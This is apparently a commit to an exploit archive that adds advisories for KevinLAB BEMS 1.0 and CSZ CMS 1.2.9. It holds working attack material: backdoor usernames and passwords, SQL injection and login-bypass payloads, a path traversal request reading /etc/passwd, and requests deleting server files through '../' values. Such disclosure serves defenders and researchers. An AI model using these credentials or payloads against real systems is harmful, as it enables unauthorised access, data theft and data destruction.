DB: 2021-07-22

4 changes to exploits/shellcodes KevinLAB BEMS 1.0 - Undocumented Backdoor Account KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
2021-07-22 05:01:53 +00:00 · 2021-07-22 05:01:53 +00:00 · e4e9d54ac6
commit e4e9d54ac6
parent 7014821c65
5 changed files with 532 additions and 0 deletions
--- a/exploits/hardware/remote/50145.txt
+++ b/exploits/hardware/remote/50145.txt
@ -0,0 +1,53 @@
+# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kevinlab.com
+
+Vendor: KevinLAB Inc.
+Product web page: http://www.kevinlab.com
+Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
+
+Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
+management platform. KevinLAB's BEMS (Building Energy Management System) enables
+efficient energy management in buildings. It improves the efficient of energy use
+by collecting and analyzing various information of energy usage and facilities in
+the building. It also manages energy usage, facility efficiency and indoor environment
+control.
+
+Desc: The BEMS solution has an undocumented backdoor account and these sets of
+credentials are never exposed to the end-user and cannot be changed through any
+normal operation of the solution thru the RMI. Attacker could exploit this
+vulnerability by logging in using the backdoor account with highest privileges
+for administration and gain full system control. The backdoor user cannot be
+seen in the users settings in the admin panel and it also uses an undocumented
+privilege level (admin_pk=1) which allows full availability of the features that
+the BEMS is offering remotely.
+
+Tested on: Linux CentOS 7
+           Apache 2.4.6
+           Python 2.7.5
+           PHP 5.4.16
+           MariaDB 5.5.68
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5654
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
+
+
+05.07.2021
+
+--
+
+
+Backdoor accounts from the DB:
+------------------------------
+
+Username: kevinlab (permission=1)
+Password: kevin003
+
+Username: developer1 (permission=6)
+Password: 1234
--- a/exploits/hardware/webapps/50146.txt
+++ b/exploits/hardware/webapps/50146.txt
@ -0,0 +1,62 @@
+# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kevinlab.com
+
+Vendor: KevinLAB Inc.
+Product web page: http://www.kevinlab.com
+Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
+
+Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
+management platform. KevinLAB's BEMS (Building Energy Management System) enables
+efficient energy management in buildings. It improves the efficient of energy use
+by collecting and analyzing various information of energy usage and facilities in
+the building. It also manages energy usage, facility efficiency and indoor environment
+control.
+
+Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
+Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
+mechanism.
+
+Tested on: Linux CentOS 7
+           Apache 2.4.6
+           Python 2.7.5
+           PHP 5.4.16
+           MariaDB 5.5.68
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5655
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+
+
+05.07.2021
+
+--
+
+
+PoC POST data payload (extract):
+--------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+
+
+PoC POST data payload (authbypass):
+-----------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
--- a/exploits/hardware/webapps/50147.txt
+++ b/exploits/hardware/webapps/50147.txt
@ -0,0 +1,57 @@
+# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kevinlab.com
+
+Vendor: KevinLAB Inc.
+Product web page: http://www.kevinlab.com
+Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
+
+Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
+management platform. KevinLAB's BEMS (Building Energy Management System) enables
+efficient energy management in buildings. It improves the efficient of energy use
+by collecting and analyzing various information of energy usage and facilities in
+the building. It also manages energy usage, facility efficiency and indoor environment
+control.
+
+Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability.
+Input passed through the 'page' GET parameter in index.php is not properly verified
+before being used to include files. This can be exploited to disclose the contents
+of arbitrary and sensitive files via directory traversal attacks.
+
+Tested on: Linux CentOS 7
+           Apache 2.4.6
+           Python 2.7.5
+           PHP 5.4.16
+           MariaDB 5.5.68
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5656
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php
+
+
+05.07.2021
+
+--
+
+
+GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1
+
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+...
+...
--- a/exploits/php/webapps/50148.txt
+++ b/exploits/php/webapps/50148.txt
@ -0,0 +1,356 @@
+# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
+# Date: 2021-07-20
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.cszcms.com
+# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
+# Version: 1.2.9
+# Tested on: Windows 10, XAMPP
+# Reference: https://github.com/cskaza/cszcms/issues/32
+
+
+################
+# Description  #
+################
+
+# CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
+
+
+##########
+# PoC 1  #
+##########
+
+Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
+Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php
+
+Steps to Reproduce:
+
+1. Login as admin
+2. Goto Plugin Manager > Article > edit any article
+3. Upload any image as "Main Picture" and "File Upload" and click save button
+4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button
+5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2"
+
+
+1) Assumed there are files conf_secret_file.php and config_backup.txt in web root
+
+PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root
+
+Request: 
+========
+
+POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
+Host: localhost
+Content-Length: 2048
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
+Connection: close
+
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="title"
+
+article beta
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="keyword"
+
+testing file
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="short_desc"
+
+deletion
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="cat_id"
+
+2
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="content"
+
+<div class="row">
+<div class="col-md-12">
+<p>test for file deletion</p>
+</div>
+</div>
+<p><br><br></p>
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="del_file"
+
+../../../conf_secret_file.php
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="file_upload"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="mainPicture"
+
+2021/1626802955_1.png
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="del_file2"
+
+../../../config_backup.txt
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="file_upload2"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="mainFile"
+
+2021/1626802956_1.png
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="lang_iso"
+
+en
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="active"
+
+1
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="fb_comment_active"
+
+1
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="fb_comment_limit"
+
+5
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="fb_comment_sort"
+
+reverse_time
+------WebKitFormBoundaryAMyATk1BfQaBOHvY
+Content-Disposition: form-data; name="submit"
+
+Save
+------WebKitFormBoundaryAMyATk1BfQaBOHvY--
+
+---
+
+
+
+##########
+# PoC 2  #
+##########
+
+Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
+Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php
+
+Steps to Reproduce:
+
+1. Login as admin
+2. Goto General Menu > Site Setting
+3. Upload any image as "Site Logo" and "Image of og metatag" and click save button
+4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button
+5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image"
+
+
+2) Assumed there are files conf_secret_file.php and config_backup.txt in web root
+
+PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root
+
+Request: 
+========
+
+POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
+Host: localhost
+Content-Length: 5163
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
+Connection: close
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteTitle"
+
+CSZ CMS Starter
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="title_setting"
+
+2
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteFooter"
+
+&copy; %Y% CSZ CMS Starter
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteKeyword"
+
+CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteTheme"
+
+cszdefault
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteLang"
+
+english
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="additional_metatag"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="additional_js"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="pagecache_time"
+
+0
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="assets_static_domain"
+
+demo@cszcms.com
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="html_optimize_disable"
+
+1
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="del_file"
+
+../../conf_secret_file.php
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="file_upload"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteLogo"
+
+2021/1626800829_logo.png
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="del_og_image"
+
+../../config_backup.txt
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="og_image"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="ogImage"
+
+2021/1626800829_og.png
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="siteEmail"
+
+demo@cszcms.com
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="email_protocal"
+
+mail
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="smtp_host"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="smtp_user"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="smtp_pass"
+
+123456
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="smtp_port"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="sendmail_path"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="email_logs"
+
+1
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="googlecapt_sitekey"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="googlecapt_secretkey"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="ga_client_id"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="ga_view_id"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="gsearch_cxid"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="gmaps_key"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="gmaps_lat"
+
+-28.621975
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="gmaps_lng"
+
+150.689082
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="fbapp_id"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="facebook_page_id"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="adobe_cc_apikey"
+
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_bg"
+
+#645862
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_fg"
+
+#ffffff
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_link"
+
+#f1d600
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_msg"
+
+This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our 
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_linkmsg"
+
+Privacy Policy and terms.
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_moreinfo"
+
+https://www.cszcms.com/LICENSE.md
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_txtalign"
+
+left
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="cookieinfo_close"
+
+Got it!
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2
+Content-Disposition: form-data; name="submit"
+
+Save
+------WebKitFormBoundary8cAl5KcKGP0D3Qi2--
+
+---
+
+
+# For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32
+# The affected version is 1.2.9.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18517,6 +18517,7 @@ id,file,description,date,author,type,platform,port
 50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",2021-06-29,"Nehal Zaman",remote,android,
 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,
 50136,exploits/cgi/remote/50136.py,"Aruba Instant (IAP) - Remote Code Execution",2021-07-15,"Aleph Security",remote,cgi,
+50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -44278,3 +44279,6 @@ id,file,description,date,author,type,platform,port
 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,
 50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",2021-07-20,"Aakash Choudhary",webapps,php,
 50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",2021-07-20,Mesh3l_911,webapps,linux,
+50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass",2021-07-21,LiquidWorm,webapps,hardware,
+50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",2021-07-21,LiquidWorm,webapps,hardware,
+50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",2021-07-21,faisalfs10x,webapps,php,